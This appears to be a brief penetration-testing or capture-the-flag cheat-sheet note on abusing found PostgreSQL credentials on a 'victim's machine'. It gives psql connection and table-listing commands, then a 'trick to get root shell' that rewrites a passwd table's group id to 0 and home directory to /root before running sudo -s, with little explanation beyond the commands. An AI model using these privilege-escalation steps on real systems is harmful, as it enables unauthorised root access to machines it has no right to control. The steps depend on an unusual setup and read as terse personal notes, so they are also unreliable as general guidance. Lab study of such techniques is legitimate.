Postgress creds found?
https://gist.github.com/Kartones/dd3ff5ec5ea238d4c546
On the victim's machine, run
psql -d unix(database-name) UserNAME -h localhost
Run,\dt to show tables.
run
---
Trick to get root shell:
update passwd_table set gid=0 where gid=1000;
update passwd_table set homedir='/root' where homedir='/var/jail/home';
Then run sudo -s to impersonate as a root account
cat /etc/group | grep sudo to verify the gid!
Last updated